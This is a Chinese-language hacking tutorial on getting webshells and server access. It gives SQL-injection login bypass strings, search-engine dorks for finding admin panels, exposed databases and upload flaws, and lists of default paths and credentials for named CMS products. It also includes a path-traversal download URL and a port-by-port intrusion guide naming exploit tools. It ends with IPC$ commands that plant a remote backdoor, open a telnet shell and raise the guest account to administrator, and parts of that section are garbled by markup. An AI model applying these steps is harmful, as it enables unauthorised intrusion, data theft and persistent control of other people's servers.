怎樣拿shell的技巧

怎樣拿shell的技巧結合本人和網絡上的一些資料,僅供參考!

經典的用戶名密碼
‘or’=’or’
‘or’1’=’1

這2個密碼在很多網站後臺,QQ空間相冊都可以登陸,不過不是100%而已….

inurl: 用於搜索網頁上包含的URL. 這個語法對尋找網頁上的搜索,幫助之類的很有用.
intext: 只搜索網頁部分中包含的文字(也就是忽略了標題,URL等的文字).
site: 可以限制你搜索範圍的域名.
filetype: 搜索文件的後綴或者擴展名
intitle: 限制你搜索的網頁標題.
allintitle: 搜索所有關鍵字構成標題的網頁. 但是推薦不要使用
link: 可以得到一個所有包含了某個指定URL的頁面列表. 例如link:www.google.com 就可以得到所有連接到Google的頁面

===================================================
intext:管理
filetype:mdb
inurl:file
site:xx.com filetype:txt 查找TXT文件 其他的依次內推
site:xx.com intext:管理
site:xx.com inurl:login
site:xx.com intitle:後臺
查看服務器使用的程序
site:xx.com filetype:asp
site:xx.com filetype:php
site:xx.com filetype:jsp
查看上傳漏洞:
site:xx.com inurl:file
site:xx.com inurl:load
查找注射點:
site:xx.com filetype:asp
site:tw inurl:asp?id= 這個是找臺灣的

site:jp inurl:asp?id= 這個是找日本的

site:ko inurl:asp?id= 這個是找韓國的
依次類推

intitle:旁註- 網站小助手filetype:asp
inurl:editor/db/
inurl:eWebEditor/db/
inurl:bbs/data/
inurltabackup/
inurl:blog/data/
inurl:\boke\data
inurl:bbs/database/
inurl:conn.asp
inc/conn.asp

管理入口:
admin
admin_index
admin_admin
index_admin
admin/index
admin/default
admin/manage
admin/login
manage_index
index_manage
superadmin
admin1
admin_login
login_admin
ad_login
ad_manage
count
manager
guanli
denglu
houtai
houtaiguanli
htgl
adminlogin
adminuserlogin
adm_login
chklogin
chkadmin
users
adduser
admin_user
edituser
adminadduser
member
members
editmember
adminmember
addmember
logout
exit
login_out
adminedit
admin_edit
delete
admindelete
admin_delete
up
upload
upfile
backup
config
test
webmaster
root
aadmin
admintab
admin_main
art
article
databases
db
dbase
devel
files
forum
girl
girls
htdocs
idea
ideas
include
includeinc
includes
incoming
install
manual
misc
mrtg
private
program
programming
programs
public
secret
secrets
server_stats
server-info
server-status
set
setting
setup


snmp
source
sources
sql
statistics
Stats
telephone
temp
temporary
tool
tools
usage
weblog
weblogs
webstats
work
wstats
wwwlog
wwwstats
wenzhang
admin/login.asp
admin_index.asp
bbs/admin_index.asp
article/admin/admin.asp
admin/aspcheck.asp
inc/config.asp
eWebEditor/admin_login.asp
editor/admin_login.asp
login/login
login/index
login/super
login1
update
count_admin
add_admin
admin_pass
newbbs/login
down/login
bbs/admin/login
main/login
admin/manage.asp
manage/login.asp
user.asp
conn.asp
logout.asp
readme.txt
說明.txt
manager/login
manager/login.asp
manager/admin.asp
login/admin/admin.asp
houtai/admin.asp
guanli/admin.asp
denglu/admin.asp
admin_login/admin.asp
admin_login/login.asp
admin/manage/admin.asp
admin/manage/login.asp
admin/default/admin.asp
admin/default/login.asp
member/admin.asp
member/login.asp
administrator/admin.asp
administrator/login.asp
強大的數據庫:
database/PowerEasy4.mdb #動易網站管理系統4.03數據庫
database/PowerEasy5.mdb
database/PowerEasy6.mdb
database/PowerEasy2005.mdb
database/PowerEasy2006.mdb
database/PE_Region.mdb
data/dvbbs7.mdb #動網論壇數據庫
databackup/dvbbs7.mdb #動網論壇備份數據庫
bbs/databackup/dvbbs7.mdb #動網論壇備份數據庫
data/zm_marry.asp #動網sp2美化版數據庫
databackup/dvbbs7.mdb
admin/data/qcdn_news.mdb #青創文章管理系統數據庫
firend.mdb #交友中心數據庫
database/newcloud6.mdb #新雲管理系統6.0數據庫
database/%23newasp.mdb #新雲網站系統
blogdata/L-BLOG.mdb #L-BLOG v1.08數據庫
blog/blogdata/L-BLOG.mdb #L-BLOG v1.08數據庫
database/bbsxp.mdb #BBSXP論壇數據庫
bbs/database/bbsxp.mdb #BBSXP論壇數據庫
access/sf2.mdb #雪人論壇程序v2.0數據庫
data/Leadbbs.mdb #LeadBBS論壇 v3.14數據庫
bbs/Data/LeadBBS.mdb #LeadBBS論壇 v3.14數據庫
bbs/access/sf2.mdb #雪人論壇程序v2.0數據庫
fdnews.asp #六合專用BBS數據庫
bbs/fdnews.asp #六合專用BBS數據庫
admin/ydxzdate.asa #雨點下載系統 v2.0+sp1數據庫
data/down.mdb #動感下載系統xp ver2.0數據庫
data/db1.mdb #動感下載系統xp v1.3數據庫
database/Database.mdb #軒溪下載系統 v3.1數據庫
db/xzjddown.mdb #lhdownxp下載系統數據庫
db/play.asp #娛樂先鋒論壇 v3.0數據庫
mdb.asp #驚雲下載系統 v1.2數據庫
admin/data/user.asp #驚雲下載系統 v3.0數據庫
data_jk/joekoe_data.asp #喬客6.0數據庫
data/news3000.asp #沸騰展望新聞系統 v1.1數據庫
data/appoen.mdb #惠信新聞系統4.0數據庫
data/12912.asp #飛龍文章管理系統 v2.1數據庫
database.asp #動感極品下載管理系統 v3.5
download.mdb #華仔軟件下載管理系統 v2.3
dxxobbs/mdb/dxxobbs.mdb #dxxobbs論壇數據庫
db/6k.asp #6kbbs 用戶名:admin 密碼:6kadmin
database/snowboy.mdb #雪孩論壇 默認後臺admin/admin_index.asp
database/%23mmdata.mdb #依爽社區
editor/db/ewebeditor.mdbeWebEditor/db/ewebeditor.mdb

上穿漏洞:
/eWebEditor/upload.asp #eWebEditor上傳頁面
/editor/upload.asp #eWebEditor上傳頁面
/bbs/upfile.asp #動網論壇上傳頁面
/forum/upfile.asp #動網論壇上傳頁面
/dvbbs/upfile.asp #動網論壇上傳頁面
/upfile_soft.asp #動力管理系統上傳頁面
/upload.asp?action=upfile #喬客6.0上傳頁面
/upfile.asp #動網論壇上傳頁面
/bbs/down_addsoft.asp #動網論壇插件上傳頁面
/bbs/down_picupfile.asp #動網論壇插件上傳頁面
/down_picupload.asp #動網論壇插件上傳頁面
/admin/admin_upfile.asp #管理員後臺上傳頁面
/admin/upfile.asp #管理員後臺上傳頁面
/admin/upload.asp #管理員後臺上傳頁面
/admin/uploadfaceok.asp #塵緣上傳頁面
/news/admin/upfile.asp #新聞管理上傳頁面
/admin_upfile.asp #飛龍文章管理系統 v2.0
/user_upfile.asp #飛龍文章管理系統 v2.0
/upload_flash.asp #秋葉購物商城上傳頁面
/Saveannounce_upload.asp #購物中心上傳頁面
/UploadFace.asp #沸騰展望新聞系統 v1.1
/bbs/diy.asp #Domian3.0默認木馬
/UploadSoft/diy.asp #Domian3.0默認木馬
/diy.asp #Domian3.0默認木馬
/upload/upload.asp #某某文章管理系統
/mybbs/saveup.asp #MYBBS論壇上傳頁面
/dxxobbs/upload.asp #DxxoBBS論壇上傳頁面
/img_upfile.asp #任我飛揚驛站上傳頁面
/Upfile_SoftPic.asp #動力管理系統上傳頁面
/upfile_flash.asp #秋葉購物商城上傳頁面

PHP的:
phpmyadmin
include/config.inc.php
include/config.php
lib/config.php

首先打http://www.baidu.com,在關鍵詞輸入框中輸入index of mp3,選擇回車搜索,得到了一些mp3網站的資源列表

以下是百度搜索排名
index of mpeg4
3. index of mp3
4. index of rmvb
5. index of rm
7. index of movie
8. index of swf
9. index of jpg
10. index of admin
12. index of pdf
13. index of doc
14. index of wmv
15. index of mdb
16. index of mpg
17. index of mtv
18. index of software
19. index of mov
20. index of asf
23. index of lib
24. index of vod
25. index of rar
27. index of exe
28. index of iso
29. index of video
30. index of book
31. index of soft
32. index of chm
33. index of password
34. index of game
35. index of music
36. index of dvd
37. index of mid
38. index of ebook
40. index of download

最重要的記住頁面一些關鍵的字 具有一定的特性的比如
[轉到父目錄]
這幾個字雖然很普通但是不要忘了一般有遍歷目錄漏洞的站點都有個這個

bbs/data/+轉到父目錄
data/+轉到父目錄
/+轉到父目錄
轉到父目錄rmvb
inurl:/diy.asp

—–附:”這些資料有些年代,適用於初學者!

1,
到GoogLe,搜索一些關鍵字,edit.asp? 韓國肉雞爲多,多數爲MSSQL數據庫!

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘雞和一個ASP木馬.
文件名是login.asp
路徑組是/manage/
關鍵詞是went.asp
用’or’=’or’來登陸

4,
關鍵字:Co Net MIB Ver 1.0網站後臺管理系統

帳號密碼爲 ‘or’=’or’

5.
動感購物系統
inurl:help.asp登陸,如未註冊成爲會員!

upLoad_bm1.asp和upLoad_c1.asp這兩個隨便選個,一般管理員都忽視了這2漏洞

6。
默認數據庫地址blogdata/acblog.asa
關鍵字:acblog

7.
百度 /htdocs
註冊裏可以直接上傳asa文件!

8.
/Database/#newasp.mdb
關鍵詞:NewAsp SiteManageSystem Version

9.
用挖掘機
關鍵字:Powered by WEBBOY
頁面:/upfile.asp

10.
baidu中搜索關鍵字Ver5.0 Build 0519
(存在上傳漏洞)

11.
Upfile_Article.asp bbs/upfile.asp
輸入關鍵字:powered by mypower ,

12.
inurl:winnt\system32\inetsrv\ 在google裏面輸入這個就可以找到很多網站

13.
現在GOOGLE搜索關鍵字 intitle:網站小助手 inurl:asp

14.
鍵字: 首頁 最新動態 新手指南 舞曲音樂 下載中心 經典文章 玩家風采 裝備購買 站內流言 友情連接 本站論壇

挖掘雞的關鍵字 添 setup.asp

15.
VBulletin論壇的數據庫
默認數據庫地址!
/includes/functions.php
工具:
1.網站獵手 下載地址:百度 Google!
2.Google
關鍵字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一個就可以了

16.
1.打開百度或GOOGLE搜索,輸入powered by comersus ASP shopping cart
open source。 這是一個商場系統。
2.網站的最底部分,有個 Comersus Open Technologies LC。打開看下~~comersus系統~
猜到,comersus.mdb. 是數據庫名
數據庫都是放在database/ 後的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp換成database/comersus.mdb,不能下載。
那樣把前一個”store/”除去,再加上database/comersus.mdb 試試

17.
無憂傳奇官方站點程序。
1、後臺管理地址:http://您的域名/msmiradmin/
2、默認後臺管理帳號:msmir
3、默認後臺管理密碼:msmirmsmir
數據庫文件爲 http://您的域名/msmirdata/msmirArticle.mdb
數據庫連接文件爲 */Conn.asp

18.
百度裏輸入/skins/default/

19.
利用挖掘機
關鍵機:power by Discuz
路徑:/wish.php
配合:
Discuz!論壇 wish.php遠程包含漏洞 工具使用

20.
上傳漏洞.
工具 : Domain3.5
網站獵手 1.5版
關鍵字powered by mypower
檢測的頁面或文件插入upfile_photo.asp

21.
新雲漏洞
這個漏洞ACCESS和SQL版通吃。
Google搜索關鍵字 “關於本站 - 網站幫助 - 廣告合作 - 下載聲明 - 友情連接 - 網站地圖 - 管理登錄”
把flash/downfile.asp?url=uploadfile/../../conn.asp提交到網站根目錄。就可以下載conn.asp
以源碼,軟件等下載站居多。
大家時常碰到數據庫如果前面或者中間+了# 可以用%23替換就可以下載了
\database\%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb

22.
通吃所有商城+動力上傳系統

使用工具:挖掘雞 v1.1 明小子
商城入侵:
關鍵字:選購->加入購物車->去收銀臺->確認收貨人信息->選付款方式->選配送方式->在線支付或下單後匯款->匯款確認->發貨->完成
漏洞頁面:upload.asp
upfile_flash.asp

動力入侵:
關鍵字:powered by mypower
漏洞頁面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp

23.
注射漏洞
百度搜索ioj’s blog

24
動易
列目錄
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp

25.
工具:網站獵手
關鍵詞:inurl:Went.asp
後綴:manage/login.asp
口令:’or’=’or’

26.
入侵魔獸私服
需要的工具:ASP木馬一隻。
Domain3.5明小子
關鍵字:All Right Reserved Design:遊戲聯盟
後臺地址:admin/login.asp
數據庫的地址:chngame/#chngame.mdb

27.
漏洞是利用管理員iis設置的失誤
用baidu 關鍵字就是比較罕見的腳本名
動網: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
動易: admin_articlerecyclebin.asp

28.
國外站的爆庫漏洞
關鍵字:sad Raven’s Guestbook
密碼地址:/passwd.dat
後臺地址:/admin.php

29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP瀏覽器
2,WAP編碼轉換器
關鍵字:”intextiscuz! 4.1.0”

30.
關鍵字:尚奈克斯
後臺路徑/system/manage.asp
直接傳ASP木馬

31.
工具
1:網站獵手
2:大馬一個
關鍵字:切勿關閉Cookies功能,否則您將不能登錄
插入diy.asp

32.
關鍵字:Team5 Studio All rights reserved
默認數據庫ta/team.mdb

33.
工具: 挖掘機 輔臣數據庫讀取器
關鍵字: 企業簡介 產品展示 產品列表
後綴添加: /database/myszw.mdb
後臺地址: admin/Login.asp

34.
關鍵子 XXX inurl:Nclass.asp
在”系統設置”裏寫個木馬。
會被保存到 在 config.asp內。

35.
不進後臺照樣拿動網WEBSHELL
data.asp?action=BackupData 動網數據庫備份默認路徑

36.
工具:網站獵手 WebShell
關鍵字:inurl:Went.asp
後綴:manage/login.asp
弱口令:’or’=’or’

37.
關鍵字owered byCDN_NEWS
隨便掃遍文章加一個’ ,來試探注入點
後臺地址:admin_index.asp

38.
入侵雷池新聞發佈系統
關鍵字:leichinews
去掉leichinews後面的.
打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
再上傳馬…..
進訪問uppic anran.asp 登陸馬.

39.
關鍵字ower System Of Article Management Ver 3.0 Build 20030628
默認數據庫tabase\yiuwekdsodksldfslwifds.mdb
後臺地址:自己掃描!

40.
一、通過GOOGLE搜索找大量注入點
關鍵字:asp?id=1 gov.jp/ asp?id=
頁數:100
語言:想入侵哪個國家就填什麼語言吧

41.
關鍵字:Powered by:94KKBBS 2005
利用密碼找回功能 找回admin
提問:ddddd 回答:ddddd

42.
關鍵字:inurl:Went.asp
後臺爲manage/login.asp
後臺密碼: ‘or’=’ 或者 ‘or”=”or’ 登錄 進入
默認數據庫地址atabase/DataShop.mdb

43.
關鍵字:** inurl:readnews.asp
把最後一個/改成%5c ,直接暴庫,看密碼,進後臺
隨便添加個新聞 在標題輸入我們的一句話木馬

44.
工具:一句話木馬
BBsXp 5.0 sp1 管理員猜解器
關鍵詞:powered by bbsxp5.00
進後臺,備份一句話馬!

45.
關鍵字:程序核心:BJXSHOP網上開店專家
後臺:/admin
各個端口的入侵方法
1. 1433端口入侵 scanport.exe 查有1433的機器 SQLScanPass.exe 進行字典暴破(字典是關鍵) 最後
SQLTools.exe入侵 對sql的sp2及以下的系統,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本機端口
sqlhelloF.exe 入侵ip 1433 本機ip 本機端口 (以上反向的,測試成功) sqlhelloz.exe 入侵ip 1433
(這個是正向連接)
2. 4899端口入侵 用4899過濾器.exe,掃描空口令的機器
3. 3899的入侵 對很早的機器,可以試試3389的溢出(win3389ex.exe) 對2000的機器,可以試試字典暴破
。(tscrack.exe)
4. 80入侵 對sp3以前的機器,可以用webdav入侵; 對bbs論壇,可以試試上傳漏洞(upfile.exe或
dvup_delphi.exe) 可以利用SQL進行注入。(啊D的注入軟件)。
5. serv-u入侵(21端口) 對5. 004及以下系統,可用溢出入侵。(serv5004.exe) 對5.1.0.0及以下系
統,可用本地提升權限。(servlocal.exe) 對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
6. 554端口 用real554.exe入侵。
7. 6129端口 用DameWare6129.exe入侵。
8. 系統漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 進行溢出入侵。
9. 3127等端口 可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 其他入侵 利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。
經典IPC1.C:netuse ”>\127.0.0.1\IPC/user:admintitratorsadministratorsIP(127.0.0.1administrators2.C:>copysrv.exe ">\\127.0.0.1\adminsrv.exeTools 是指admin用戶的 c:\winnt\system32\,大家還可
以使用cd ,意思是C盤與D盤,這看你要複製到什麼地方去了)。 3. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 查
查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。 4. C:>at
[url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 11:05 srv.exe 用at命令啓動srv.exe吧(這裏設置的時間要比主機時間快,不然你怎麼啓
動啊. 5. C:>net time [url=file://%20%20127.0.0.1/]\127.0.0.1[/url] 再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上
午 11:05,那就準備 開始下面的命令。 6. C:>telnet 127.0.0.1 99 這裏會用到Telnet命令吧,注意
端口是99。Telnet默認的是23端口,但是我們使用的 是SRV在對方計算機中爲我們建立一個99端口的
Shell。 雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打 算建立一
個Telnet服務!這就要用到ntlm了 7.C:>copy ntlm.exe ">127.0.0.1\admin 用Copy命令把
ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。 8. C:\WINNT\system32>ntlm 輸入
ntlm啓動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這 個程序在對方計算機上
運行)。當出現”DONE”的時候,就說明已經啓動正常。然後使 用”net start telnet”來開啓Telnet服務
! 9. Telnet 127.0.0.1,接着輸入用戶名與密碼就進入對方了,操作就像在DOS上操作 一樣簡單!(然
後你想做什麼?想做什麼就做什麼吧,哈哈) 爲了以防萬一,我們再把guest激活加到管理組 10. C:>net
user guest /active:yes 將對方的Guest用戶激活 11. C:>net user guest 1234 將Guest的密碼改爲
1234,或者你要設定的密碼 12. C:>net localgroup administrators guest /add 將Guest變爲
Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我 們可以用guest再次訪問這臺計
算機)

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章